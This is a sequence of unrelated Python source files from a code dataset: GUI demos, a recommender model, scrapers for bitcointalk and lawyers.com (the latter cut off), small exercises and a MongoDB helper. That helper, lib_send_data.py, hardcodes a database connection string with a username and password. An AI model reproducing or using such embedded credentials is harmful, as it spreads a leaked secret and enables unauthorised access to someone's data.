self.canvas.pack()\n\n self.screen = TurtleScreen(self.canvas)\n self.screen.setworldcoordinates(0,400,500,0)\n self.screen.tracer(False) #schaltet Turtle-Animation aus\n \n self.circle = Circle(self.screen)\n\n def moveCircle(self,event):\n self.circle.move(event.x,event.y)\n self.screen.update()\n\n \nclass Circle(RawTurtle):\n def __init__(self,screen):\n RawTurtle.__init__(self,screen)\n self.shape(\"circle\")\n self.penup()\n \n def move(self,x,y):\n self.goto(x,y)\n\n \nif __name__ == \"__main__\":\n root = Tk()\n app = Main(root)\n root.mainloop()\n","sub_path":"Quellen/python/python - weiterbildung kael/py zu Kap 6/followmeTurtleOOP.py","file_name":"followmeTurtleOOP.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"121772270","text":"import Utilities\r\n\r\nclass User(object):\r\n\r\n\tdef __init__(self,name=\"\",age=-1,gender=\"\",conditions=None):\r\n\t\tself.name = name\r\n\t\tself.age = age\r\n\t\tself.gender = gender\r\n\t\tself.conditions = conditions\r\n\r\n\tdef saveUserInfo(self):\r\n\t\tresult = self.name + \"\\n\\n\"\r\n\t\tresult += str(self.age) + \"\\n\\n\"\r\n\t\tresult += self.gender + \"\\n\\n\"\r\n\t\t# all variables split by double linebreak\r\n\t\tfor condition in self.conditions:\r\n\t\t\t# conditions all on same line, split by double comma\r\n\t\t\tresult += condition + \",,\"\r\n\t\tresult += \"\\n\\n\"\r\n\t\tresult += \"**END USER INFO**\"\r\n\t\tUtilities.writeFile(\"%s.txt\"%self.name,result)\r\n\r\n\t@staticmethod\r\n\tdef loadUserInfo(filepath):\r\n\t\tfullInfo = Utilities.readFile(filepath)\r\n\t\tlines = fullInfo.split(\"\\n\\n\")\r\n\t\tname = lines[0]\r\n\t\tage = int(lines[1])\r\n\t\tgender = lines[2]\r\n\t\tconditions = lines[3].split(\",,\")[:-1]\r\n\t\tnewUser = User(name,age,gender,conditions)\r\n\t\treturn newUser\r\n\r\n\tdef toString(self):\r\n\t\tresult = \"NAME: \" + self.name + \"\\n\"\r\n\t\tresult += \"AGE: \" + str(self.age) + \"\\n\"\r\n\t\tresult += \"GENDER: \" + self.gender + \"\\n\"\r\n\t\tresult += \"CONDITIONS: \"\r\n\t\tfor condition in self.conditions:\r\n\t\t\tresult += condition + \", \"\r\n\t\treturn result","sub_path":"user_class.py","file_name":"user_class.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"425109296","text":"import torch\nimport matplotlib.pyplot as plt\nimport numpy as np \nimport argparse\nimport os\nimport torch.nn as nn\nfrom torchvision import transforms\nfrom data_loader import get_loader\nfrom model import SISR\nfrom PIL import Image\nfrom math import log10\n\n\n# Device configuration\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\ndef load_image(image_path, transform=None):\n image = Image.open(image_path) \n if transform is not None:\n image = transform(image).unsqueeze(0)\n return image\n\ndef main(args):\n # Image preprocessing\n transform = transforms.Compose([transforms.ToTensor()])\n criterion = nn.MSELoss(reduction='mean')\n\n model = SISR()\n # Build models\n model = model.to(device)\n model.load_state_dict(torch.load(args.model_path))\n valid_data_loader = get_loader(args.valid_image_dir, transform, 1, shuffle=True, num_workers=3)\n\n avg_PSNR = 0\n with torch.no_grad():\n for i, (hr_image, lr_image) in enumerate(valid_data_loader):\n # Set mini-batch dataset\n hr_image = hr_image.to(device)\n lr_image = lr_image.to(device)\n \n # Forward, backward and optimize\n outputs = model(lr_image)\n loss = criterion(outputs, hr_image)\n\n # Print log info\n avg_PSNR += 10 * log10(1 / loss.item())\n\n print('Validation PSNR: %f' % (float(avg_PSNR) / 100))\n\n fig = plt.figure()\n # Prepare an image\n for i, index in enumerate([15, 69, 96]):\n lr_image = load_image('./data/mscoco2017_val_resized/LR/%04d.jpg' % index, transform)\n lr_image_tensor = lr_image.to(device)\n \n # Generate an caption from the image\n with torch.no_grad():\n outputs = model(lr_image_tensor)\n hr_image = Image.open('./data/mscoco2017_val_resized/HR/%04d.jpg' % index)\n \n # print(outputs.size())\n # print(torch.squeeze(outputs).size())\n # print(torch.squeeze(outputs).permute(1, 2, 0).size())\n # exit()\n plt.subplot(231+i)\n plt.imshow(np.asarray(hr_image))\n # plt.imshow(np.asarray(hr_image))\n plt.subplot(234+i)\n image = (torch.squeeze(outputs).permute(1, 2, 0).cpu().numpy() * 255).astype(np.uint8)\n plt.imshow(image)\n plt.show()\n \nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--model_path', type=str, help='path for trained decoder')\n parser.add_argument('--valid_image_dir', type=str, default='data/mscoco2017_val_resized', help='directory for resized validation images')\n # Model parameters (should be same as paramters in train.py)\n args = parser.parse_args()\n main(args)","sub_path":"sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":2709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"102844019","text":"from PIL import Image\nimport requests\nfrom io import BytesIO\nimport cv2\nimport os\nimport numpy\nimport utils\n \n## 保存切割图片\ndef saveCutImg(gray, saveDir, regions, count):\n for region in regions:\n x, y, w, h = region\n image = utils.getXYWH(gray, x, y, w, h)\n count = count + 1\n p = os.path.join(saveDir, \"{}.png\".format(str(count).zfill(8)))\n cv2.imwrite(p, image)\n return count\n\ndef cutImgByFile(face_cascade, txtPath, saveDir, count):\n imgUrls = utils.readText(txtPath)\n print(len(imgUrls))\n for (i, img) in enumerate(imgUrls):\n try:\n print(\"[INFO] processing image {}/{}\".format(i + 1, len(imgUrls)))\n \n response = requests.get(img, headers = utils.getHeaders())\n img = Image.open(BytesIO(response.content))\n gray = cv2.cvtColor(numpy.asarray(img), cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray, 1.2, 3)\n count = saveCutImg(gray, saveDir, faces, count)\n except Exception as e:\n print(e)\n return count\n\ndef cutImgByDir(face_cascade, path, count):\n for p in os.listdir(path) :\n c = 0\n p = os.path.join(path, p)\n if os.path.isfile(p):\n p2 = os.path.splitext(p)[0]\n if not os.path.exists(p2):\n os.makedirs(p2)\n else :\n continue\n c = cutImgByFile(face_cascade, p, p2, c);\n return count + c\n\npath = \"url\"\nface_cascade = utils.getFace()\ncount = 0\n\ncount = cutImgByDir(face_cascade, path, count)\nprint(count)\n ","sub_path":"demo/face/cut_img.py","file_name":"cut_img.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"388534923","text":"# Visualization library\n# from tqdm import tqdm\n\n# python standard library\nimport datetime as dt\nfrom collections import Counter, defaultdict\n\n# Data library\nimport numpy as np\nimport pandas as pd\n\n# Torch\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\nfrom torchtext.vocab import Vectors\n\n# Models\nfrom Models.word2vec import Kakao_Tokenizer\nfrom Models.dataset import SongTagDataset, SongTagGenreDataset\n\n# Utils\nfrom Utils.file import load_json, write_json\nfrom Utils.preprocessing import DicGenerator, most_popular, remove_seen, most_similar, most_similar_emb\nfrom Utils.static import autoencoder_encoder_layer_path, vectorizer_weights_path, plylst_emb_path, plylst_emb_gnr_path, plylst_w2v_emb_path\nfrom Utils.static import train_file_path, song_meta_file_path, song2id_file_path, result_file_base\n\n# CUDA\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\n\n\nclass Recommender(nn.Module) :\n def __init__(self, auto_weights=autoencoder_encoder_layer_path, w2v_weights=vectorizer_weights_path) :\n super(Recommender, self).__init__()\n\n self.autoencoder = self._load_autoencoder(auto_weights)\n self.vectorizer, self.word_dict = self._load_vectorizer(w2v_weights)\n self.tokenizer = Kakao_Tokenizer()\n self.cos = nn.CosineSimilarity(dim=1)\n\n self.pre_auto_emb = pd.DataFrame(np.load(plylst_emb_path, allow_pickle=True).item()).T\n self.pre_auto_emb_gnr = pd.DataFrame(np.load(plylst_emb_gnr_path, allow_pickle=True).item()).T\n self.pre_w2v_emb = pd.DataFrame(np.load(plylst_w2v_emb_path, allow_pickle=True).item()).T\n\n self._load_dictionary()\n\n def _load_autoencoder(self, model_path) :\n autoencoder = torch.load(model_path, map_location=torch.device('cpu'))\n\n return autoencoder\n\n def _load_vectorizer(self, model_path) :\n vectors = Vectors(name=model_path)\n embedding = nn.Embedding.from_pretrained(vectors.vectors, freeze=False).to(device)\n\n return embedding, dict(vectors.stoi)\n\n def _load_dictionary(self) :\n train_data = load_json(train_file_path)\n song_meta = load_json(song_meta_file_path)\n \n self.song_plylst_dic, self.song_tag_dic, self.plylst_song_dic, self.plylst_tag_dic, self.tag_plylst_dic, self.tag_song_dic, _, self.song_artist_dic = DicGenerator(train_data, song_meta)\n self.freq_song = set(dict(np.load(song2id_file_path, allow_pickle=True).item()).keys())\n _, self.song_popular = most_popular(train_data, 'songs', 200)\n _, self.tag_popular = most_popular(train_data, 'tags', 20)\n \n def similarity_by_auto(self, question_data, genre:bool) :\n q_id = pd.DataFrame(question_data)['id']\n\n with torch.no_grad() :\n if genre :\n train_tensor = torch.from_numpy(self.pre_auto_emb_gnr.values).to(device)\n question_dataset = SongTagGenreDataset(question_data)\n question_loader = DataLoader(question_dataset, batch_size=256, num_workers=8)\n \n for _id, _data, _dnr, _dtl_dnr in question_loader :\n _data = _data.to(device)\n auto_emb = self.autoencoder(_data)\n auto_emb = torch.cat([auto_emb, _dnr.to(device), _dtl_dnr.to(device)], dim=1)\n else :\n train_tensor = torch.from_numpy(self.pre_auto_emb.values).to(device)\n question_dataset = SongTagDataset(question_data)\n question_loader = DataLoader(question_dataset, batch_size=256, num_workers=8)\n\n for _id, _data in question_loader :\n _data = _data.to(device)\n auto_emb = self.autoencoder(_data)\n\n scores = torch.zeros([auto_emb.shape[0], train_tensor.shape[0]], dtype=torch.float64).to(device)\n for idx, vector in enumerate(auto_emb) :\n output = self.cos(vector.reshape(1, -1), train_tensor)\n scores[idx] = output\n\n scores = torch.sort(scores, descending=True)\n sorted_scores, sorted_idx = scores.values.cpu().numpy(), scores.indices.cpu().numpy()\n\n s = pd.DataFrame(sorted_scores, index=q_id)\n if genre :\n i = pd.DataFrame(sorted_idx, index=q_id).applymap(lambda x : self.pre_auto_emb_gnr.index[x])\n else :\n i = pd.DataFrame(sorted_idx, index=q_id).applymap(lambda x : self.pre_auto_emb.index[x])\n\n return pd.DataFrame([pd.Series(list(zip(i.loc[idx], s.loc[idx]))) for idx in q_id], index=q_id) \n \n def similarity_by_w2v(self, question_data) :\n def find_word_embed(words) :\n ret = []\n for word in words :\n try :\n ret.append(self.word_dict[word])\n except KeyError :\n pass\n \n return ret\n question_df = pd.DataFrame(question_data)\n\n p_ids = question_df['id']\n p_token = question_df['plylst_title'].map(lambda x : self.tokenizer.sentences_to_tokens(x)[0])\n p_tags = question_df['tags']\n p_dates = question_df['updt_date'].str[:7].str.split('-')\n\n question_df['tokens'] = p_token + p_tags + p_dates\n question_df['emb_input'] = question_df['tokens'].map(lambda x : find_word_embed(x))\n\n outputs = []\n for e in question_df['emb_input'] :\n _data = torch.LongTensor(e).to(device)\n with torch.no_grad() :\n word_output = self.vectorizer(_data)\n if len(word_output) :\n output = torch.mean(word_output, axis=0)\n else :\n output = torch.zeros(200).to(device)\n outputs.append(output)\n outputs = torch.stack(outputs)\n\n train_tensor = torch.from_numpy(self.pre_w2v_emb.values).to(device)\n\n scores = torch.zeros([outputs.shape[0], train_tensor.shape[0]], dtype=torch.float64).to(device)\n for idx, vector in enumerate(outputs) :\n output = self.cos(vector.reshape(1, -1), train_tensor)\n scores[idx] = output\n\n scores = torch.sort(scores, descending=True)\n sorted_scores, sorted_idx = scores.values.cpu().numpy(), scores.indices.cpu().numpy()\n\n s = pd.DataFrame(sorted_scores, index=p_ids)\n i = pd.DataFrame(sorted_idx, index=p_ids).applymap(lambda x : self.pre_w2v_emb.index[x]) \n\n return pd.DataFrame([pd.Series(list(zip(i.loc[idx], s.loc[idx]))) for idx in p_ids], index=p_ids) \n\n def _counting_question_data(self, q_songs, q_tags) :\n song_plylst_C = Counter()\n tag_song_C = Counter()\n\n for q_s in q_songs:\n song_plylst_C.update(self.song_plylst_dic[q_s])\n # 수록 tag에 대해\n for q_t in q_tags:\n tag_song_C.update(self.tag_song_dic[q_t])\n # 수록곡 수로 나눠서 비율로 계산\n for i, j in list(song_plylst_C.items()):\n if len(self.plylst_song_dic[i]) > 0:\n song_plylst_C[i] = (j / len(self.plylst_song_dic[i]))\n\n return song_plylst_C, tag_song_C\n \n def _check_question_status(self, q_songs, q_tags) :\n song_tag_status = 2\n if len(q_songs) == 0 and len(q_tags) == 0:\n song_tag_status = 0\n elif len(q_songs) <= 3:\n song_tag_status = 1\n\n return song_tag_status\n\n def _calc_scores(self, plylsts, scores, song_plylst_C, n_msp, n_mtp, q_songs, new_song_plylst_dict) :\n plylst_song_scores = defaultdict(float)\n plylst_tag_scores = defaultdict(float)\n \n # 3-1. plylst_song_scores 계산\n for idx, ms_p in enumerate(plylsts[0]):\n for song in self.plylst_song_dic[ms_p]:\n song_score = 0\n for q_s in q_songs:\n try:\n song_score += len(new_song_plylst_dict[q_s] & new_song_plylst_dict[song]) / len(new_song_plylst_dict[q_s])\n except:\n pass\n if song in self.freq_song:\n plylst_song_scores[song] += song_plylst_C[ms_p] * song_score * scores[0][idx] * (n_msp - idx) * 4\n else:\n plylst_song_scores[song] += song_plylst_C[ms_p] * song_score * scores[0][idx] * (n_msp - idx)\n\n for tag in self.plylst_tag_dic[ms_p]:\n plylst_tag_scores[tag] += scores[1][idx] * (n_msp - idx)\n\n # 3-2. plylst_tag_scores 계산\n for idx, mt_p in enumerate(plylsts[1]):\n for tag in self.plylst_tag_dic[mt_p]:\n plylst_tag_scores[tag] += scores[1][idx] * (n_mtp - idx)\n\n for song in self.plylst_song_dic[mt_p]:\n plylst_song_scores[song] += scores[1][idx]\n\n # 3-3. plylst_{song/tag}_scores 보정\n for idx, mt_p in enumerate(plylsts[2]):\n for song in self.plylst_song_dic[ms_p] :\n plylst_song_scores[song] += scores[2][idx] * (n_msp - idx)\n\n for tag in self.plylst_tag_dic[mt_p] :\n plylst_tag_scores[tag] += scores[2][idx] * (n_mtp - idx)\n\n plylst_song_scores = sorted(plylst_song_scores.items(), key = lambda x : x[1], reverse=True)\n plylst_tag_scores = sorted(plylst_tag_scores.items(), key = lambda x : x[1], reverse=True)\n \n return plylst_song_scores, plylst_tag_scores\n \n def _fill_no_data(self, plylst_song_scores, plylst_tag_scores) :\n # q_songs 새롭게 채워넣기 (원래는 song가 없지만 title_scores 기준 유사한 플레이리스트로부터 song 예측)\n pre_songs = [scores[0] for scores in plylst_song_scores][:200]\n pre_songs = pre_songs + remove_seen(pre_songs, self.song_popular)\n q_songs = pre_songs[:100]\n\n # q_tags 새롭게 채워넣기 (원래는 tag가 없지만 title_scores 기준 유사한 플레이리스트로부터 tag 예측)\n pre_tags = [scores[0] for scores in plylst_tag_scores][:20]\n pre_tags = pre_tags + remove_seen(pre_tags, self.tag_popular)\n q_tags = pre_tags[:10]\n\n return q_songs, q_tags\n\n def _exists_artist_filter(self, q_songs, song_tag_status, plylst_song_scores) :\n lt_song_art = []\n if len(q_songs) > 0 : # song 있을 때\n q_artists = []\n for w_song in q_songs:\n q_artists.extend(self.song_artist_dic[w_song])\n \n artist_counter = Counter(q_artists)\n artist_counter = sorted(artist_counter.items(), key=lambda x: x[1], reverse=True)\n \n if song_tag_status == 1:\n q_artists = [art[0] for art in artist_counter]\n else:\n q_artists = [x[0] for x in artist_counter if x[1] > 1]\n \n cand_ms = [scores[0] for scores in plylst_song_scores][(100 - len(q_artists)):1000]\n for cand in cand_ms:\n if q_artists == []:\n break\n if cand in q_songs:\n break\n for art in self.song_artist_dic[cand]:\n if art in q_artists :\n lt_song_art.append(cand)\n q_artists.remove(art)\n break\n \n return lt_song_art\n\n def inference(self, question_data, n_msp=50, n_mtp=90, save=True) :\n auto_scores = self.similarity_by_auto(question_data, False)\n auto_gnr_scores = self.similarity_by_auto(question_data, True)\n w2v_scores = self.similarity_by_w2v(question_data)\n\n rec_list = []\n\n for q in question_data :\n q_id = q['id']\n q_songs = q['songs']\n q_tags = q['tags']\n \n song_plylst_C, tag_song_C = self._counting_question_data(q_songs, q_tags)\n\n song_tag_status = self._check_question_status(q_songs, q_tags)\n\n # Case 1: song과 tag가 둘 다 없는 경우\n if song_tag_status == 0:\n # plylst_ms / plylst_mt: title_scores 기준 유사한 플레이리스트 n_msp / n_mtp개\n plylst_ms, song_scores = most_similar_emb(q['id'], n_msp, w2v_scores)\n plylst_mt, tag_scores = most_similar_emb(q['id'], n_mtp, w2v_scores)\n plylst_add, add_scores = most_similar_emb(q['id'], n_mtp, auto_scores)\n\n # Case 2: song과 tag가 부족한 경우\n elif song_tag_status == 1 :\n plylst_ms, song_scores = most_similar_emb(q['id'], n_msp, auto_scores)\n plylst_mt, tag_scores = most_similar_emb(q['id'], n_mtp, w2v_scores)\n plylst_add, add_scores = most_similar_emb(q['id'], n_mtp, auto_gnr_scores)\n\n # Case 3: song과 tag가 충분한 경우\n else:\n plylst_ms, song_scores = most_similar_emb(q['id'], n_msp, auto_scores)\n plylst_mt, tag_scores = most_similar_emb(q['id'], n_mtp, auto_gnr_scores)\n plylst_add, add_scores = most_similar_emb(q['id'], n_mtp, w2v_scores)\n\n plylsts = [plylst_ms, plylst_mt, plylst_add]\n scores = [song_scores, tag_scores, add_scores]\n\n new_song_plylst_dict = defaultdict(set)\n for plylst in plylsts[0]:\n for _song in self.plylst_song_dic[plylst]:\n new_song_plylst_dict[_song].add(plylst)\n\n plylst_song_scores, plylst_tag_scores = self._calc_scores(plylsts, scores, song_plylst_C, n_msp, n_mtp, q_songs, new_song_plylst_dict)\n\n if song_tag_status == 0 :\n q_songs, q_tags = self._fill_no_data(plylst_song_scores, plylst_tag_scores)\n\n lt_song_art = self._exists_artist_filter(q_songs, song_tag_status, plylst_song_scores)\n\n # 곡 추천\n if len(q_songs) > 0 : # song 있을 때\n song_similar = [scores[0] for scores in plylst_song_scores][:200]\n else : # song 없고, tag 있을 때\n song_similar = most_similar(tag_song_C, 200)\n\n ## 태그 추천\n tag_similar = [scores[0] for scores in plylst_tag_scores][:20]\n\n song_candidate = song_similar + remove_seen(song_similar, self.song_popular)\n tag_candidate = tag_similar + remove_seen(tag_similar, self.tag_popular)\n\n song_candidate = song_candidate[:100] if song_tag_status == 0 else remove_seen(q_songs, song_candidate)[:100]\n if len(lt_song_art) > 0:\n lt_song_art = [x for x in lt_song_art if x not in song_candidate]\n song_candidate[(100 - len(lt_song_art)):100] = lt_song_art\n\n tag_candidate = tag_candidate[:10] if song_tag_status == 0 else remove_seen(q_tags, tag_candidate)[:10]\n\n rec_list.append({\"id\": q_id, \"songs\": song_candidate, \"tags\": tag_candidate})\n\n if save is True:\n result_file_path = result_file_base.format(dt.datetime.now().strftime(\"%y%m%d-%H%M%S\"))\n write_json(rec_list, result_file_path)\n print('Result file save to {}'.format(result_file_path))\n else :\n return rec_list","sub_path":"Web/Models/recommender.py","file_name":"recommender.py","file_ext":"py","file_size_in_byte":15026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"500748938","text":"#write a program to check is it armstrong or not ?\n\ninput_number = input(\"enter your number\\n\")\nprint(input_number)\nnumber_length = len(input_number)\nprint(number_length)\nsum=0\nfor value in input_number:\n val = int(value)**number_length\n sum+=val\n \nprint(sum)\nif int(input_number) == sum:\n print('your number is a armstrong number')\nelse:\n print('Your number is not armstrong number')","sub_path":"armstrong_number.py","file_name":"armstrong_number.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"598634812","text":"def solve(s1,s2):\n s3 = \"\"\n s4 = \"\"\n t = 0\n for i in range(len(s1) - 1, - 1, -1):\n if s1[i] == '#':\n t += 1\n else:\n if t > 0:\n t -= 1\n else:\n s3 = s1[i] + s3\n t = 0\n for i in range(len(s2) - 1, - 1, -1):\n if s2[i] == '#':\n t += 1\n else:\n if t > 0:\n t -= 1\n else:\n s4 = s2[i] + s4\n print(s3)\n print(s4)\n\ns1 = input()\ns2 = input()\nsolve(s1,s2)\n\n\"\"\"\n'#' refers to backspace\n\ninput :- a1 = 'a##bc' , a2 = 'd#g#c'\noutput :- true\nexp :- a1 become 'c' and a2 also become 'c'\n\n\"\"\"","sub_path":"LeetCode/Backspace_String_Compare.py","file_name":"Backspace_String_Compare.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"421736253","text":"from datetime import date, timezone\nimport datetime\nimport pymongo\nfrom PyQt5 import QtCore, QtWidgets\nMyserver = 'mongodb+srv://Chayapol:aum0825904216@cluster0.xjaok.mongodb.net/?retryWrites=true&w=majority'\ndataProductlist = []\n\ndef clearProduct():\n dataProductlist.clear()\n\ndef addDatatoList(data):\n temp = {'size':data[0],\n 'price':data[1],\n 'qty':data[2]}\n dataProductlist.append(temp)\n\ndef editDatatoList(data,pointer):\n temp = {'size': data[0],\n 'price': data[1],\n 'qty': data[2]}\n dataProductlist[pointer] = temp\n\ndef deleteDatainList(pointer):\n del dataProductlist[pointer]\n\ndef getDataProducts():\n return dataProductlist\n\ndef getLastProductID():\n with (pymongo.MongoClient(Myserver)) as conn:\n db = conn.get_database('Coffee_shop')\n where = {}\n sortz = [(\"_id\",-1)]\n cursor = db.Product.find(where).sort(sortz).limit(1)\n for i in cursor:\n lastID = i['id']\n return lastID + 1","sub_path":"library/lib_send_data.py","file_name":"lib_send_data.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"567139518","text":"\"\"\" Core scraper for bitcointalk.org. \"\"\"\nfrom bitcointalk import memoizer\nimport logging\nimport getopt\nimport sys\nimport time\nimport json\nfrom datetime import datetime, timedelta\n\ndef main(argv):\n if len(argv) == 0:\n print('You must pass some parameters')\n return\n\n try:\n opts, args = getopt.getopt(argv, \"\", (\n \"boardId=\",\n \"everyN=\",\n \"since=\",\n \"until=\"\n ))\n\n boardId = None\n everyN = None\n since = None\n until = None\n untilDate = (datetime.utcnow() + timedelta(days=1)).date()\n\n for opt, arg in opts:\n if opt == \"--boardId\":\n boardId = int(arg)\n\n elif opt == '--everyN' and arg != '':\n everyN = int(arg)\n\n elif opt == '--since' and arg != '':\n since = arg\n sinceDate = datetime.strptime(since, '%Y-%m-%d').date()\n\n elif opt == '--until' and arg != '':\n until = arg\n untilDate = datetime.strptime(until, '%Y-%m-%d').date()\n\n board = memoizer.scrapeBoard(boardId, since, until)\n sleepTime = 3\n results = []\n\n logging.basicConfig(\n level=logging.INFO,\n format='%(asctime)s %(levelname)s:%(message)s',\n datefmt='%m/%d/%Y %I:%M:%S %p')\n\n logging.info(\"Beginning scrape of board ID...\".format(boardId))\n boardPageNum = 1\n while boardPageNum <= board['num_pages']:\n try:\n data = memoizer.scrapeTopicIds(boardId, boardPageNum, since, until)\n topicIds = data['topic_ids']\n if len(topicIds) == 0 and \\\n since != None and \\\n data['last_edit_first_topic'] != None:\n if sinceDate >= data['last_edit_first_topic']:\n break;\n\n topicIndex = 0\n while topicIndex < len(topicIds):\n topicId = topicIds[topicIndex]\n logging.info(\"Topic id: {0}\".format(topicId))\n try:\n topic = memoizer.scrapeTopic(topicId, since, until)\n\n topicPageNum = 1\n while topicPageNum <= topic['num_pages']:\n logging.info(\"Topic page number: {0}\".format(topicPageNum))\n try:\n dataMessages = memoizer.scrapeMessages(topic['id'], topicPageNum, since, until)\n messages = dataMessages['messages']\n logging.info(\"Found {0} messages\".format(len(messages)))\n\n if len(messages) == 0 and \\\n dataMessages['page_first_message'] != None and \\\n dataMessages['page_first_message'] >= untilDate:\n break\n\n for message in messages:\n results.append(message)\n if len(results) == everyN:\n print(results)\n # print(json.dumps(results))\n sys.stdout.flush()\n results = []\n except Exception as e:\n logging.exception(e)\n time.sleep(sleepTime)\n topicPageNum = topicPageNum - 1\n finally:\n topicPageNum = topicPageNum + 1\n\n except Exception as e:\n logging.exception(e)\n time.sleep(sleepTime)\n topicIndex = topicIndex - 1\n finally:\n topicIndex = topicIndex + 1\n\n except Exception as e:\n logging.exception(e)\n time.sleep(sleepTime)\n boardPageNum = boardPageNum - 1\n finally:\n boardPageNum = boardPageNum + 1\n\n if len(results) > 0:\n print(results)\n sys.stdout.flush()\n results = []\n\n doneMessage = \"All done\"\n print(doneMessage)\n\n except Exception as argv:\n print('Arguments parser error' + argv)\n finally:\n pass\n\nif __name__ == '__main__':\n main(sys.argv[1:])","sub_path":"scrape_board_topics.py","file_name":"scrape_board_topics.py","file_ext":"py","file_size_in_byte":4529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"575096592","text":"# fetches a jp2 tile from disk, uploads it to a buffer, and uses jp2k_mem to decode it\nimport glymur\nimport numpy as np\n\n\nif __name__ == '__main__':\n fname = 'data/example.jp2'\n orig_img_jp2 = glymur.Jp2k(fname)\n orig_img = orig_img_jp2[:]\n\n with open(fname, 'r') as img_data:\n img_buffer_jp2 = img_data.read()\n\n img_buffer_jp2 = np.frombuffer(img_buffer_jp2, dtype=np.uint8)\n img_jp2 = glymur.Jp2kMem(img_buffer_jp2)\n #img_jp2.verbose = True\n img = img_jp2[:]\n\n assert np.all(img == orig_img)\n","sub_path":"glymur/test/test_jp2k_mem.py","file_name":"test_jp2k_mem.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"96487016","text":"# 1:石头\n# 2:剪刀\n# 3:布\n# 石头赢剪刀\n# 剪刀赢布\n# 布赢石头\n# 人通过键盘输入石头,剪刀,和布\n# 电脑随机产生数字1或者2或者3\n# 如果电脑产生数字1,那么就要转化为石头\n# 如果电脑产生数字2,那么就要转化为剪刀\n# 如果电脑产生数字3,那么就要转化为布\n\n# 比较胜负\nimport random\n# pc代表电脑要出的拳,可能是1,可能2或者3\npc = random.randint(1, 3)\n# 需要把数字1,2,3转化为对应的字符串\n# 变量a存放数字转化为字符串的结果\na = None\nif pc == 1:\n a = \"石头\"\nelif pc == 2:\n a = \"剪刀\"\nelse:\n a = \"布\"\n\n# player代表人要出的拳,可能是石头或者剪刀或者布\nplayer = input(\"请输入石头或者剪刀或者布\")\n\nif (a == \"石头\" and player == \"剪刀\") or (a == \"剪刀\" and player == \"布\") or (a == \"布\" and player == \"石头\"):\n print(\"电脑出了%s, 我出了%s, 电脑赢了\" % (a, player))\nelif (a == player):\n print(\"电脑出了%s, 我出了%s, 平局\" % (a, player))\nelse:\n print(\"电脑出了%s, 我出了%s, 我赢了\" % (a, player))","sub_path":"04、 python编程/day02/3-code/25-猜拳游戏-改进版.py","file_name":"25-猜拳游戏-改进版.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"347284338","text":"from random import choice\n# List of play options\noptions = ['Rock', 'Paper', 'Scissors', 'Lizard', 'Spock']\n\noutcomes = {\n ('Scissors', 'Paper'): 'cuts',\n ('Paper', 'Rock'): 'covers',\n ('Rock', 'Lizard'): 'crushes',\n ('Lizard', 'Spock'): 'poisons',\n ('Spock', 'Scissors'): 'smashes',\n ('Scissors', 'Lizard'): 'decapitates',\n ('Lizard', 'Paper'): 'eats',\n ('Paper', 'Spock'): 'disproves',\n ('Spock', 'Rock'): 'vaporizes',\n ('Rock', 'Scissors'): 'crushes'\n}\n\nplay = True\n\nwhile play is True:\n\n computer = choice(options)\n roll = input('Please select; Rock, Paper, Scissors, Lizard or Spock\\n')\n roll = roll.lower().capitalize()\n\n # Makes sure that player makes valid choice\n while roll not in options:\n roll = input('Please select; Rock, Paper, Scissors, Lizard or Spock\\n')\n\n print(f'Player: {roll}')\n print(f'Computer: {computer}')\n\n if (roll, computer) in outcomes:\n print(f'You win! {roll} {outcomes[roll, computer]} {computer}.')\n elif (computer, roll) in outcomes:\n print(f'You lose! {computer} {outcomes[computer, roll]} {roll}.')\n else:\n print('Tie!')\n\n print('Would you like to play again? (Y/N)')\n answer = input()\n\n if answer.lower() == 'y' or answer.lower() == 'yes':\n play = True\n else:\n break\n","sub_path":"Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"100534261","text":"from urllib.request import Request, urlopen\nfrom bs4 import BeautifulSoup\nfrom docx import Document\nfrom collections import OrderedDict\nimport os, csv, re, json\n\nlawyers_com = f\"https://www.lawyers.com/all-legal-issues/{city}/{state}/law-firms{pg}/?={category}\"\n\nstate_abbrs = OrderedDict(zip(state_abbs.values(), state_abbs.keys()))\n\ndefault_path = os.chdir('/Users/RavneetKapoor/Desktop/qrtools/attsearch/csv_files')\n\n#t_states = t_state_cities.keys()\n\nfl = open(\"../us_states_cities.json\")\nfl = fl.read()\nstates_cities = json.loads(fl)\n\nstates = list(states_cities.keys())[3:7]\n\nt_categories = [\n \"Appeals\"\n]\n\ndef mk_rqst(lnk):\n req = Request(lnk, headers={'User-Agent': 'Mozilla/5.0'})\n webpage = urlopen(req).read()\n return BeautifulSoup(webpage, 'lxml')\n\ndef get_phone_num(contact):\n try:\n phone = next(contact.find(\"a\", {\"class\": \"opt-d-phone\"}).stripped_strings)\n if phone == \"View Phone #\":\n try:\n phone = 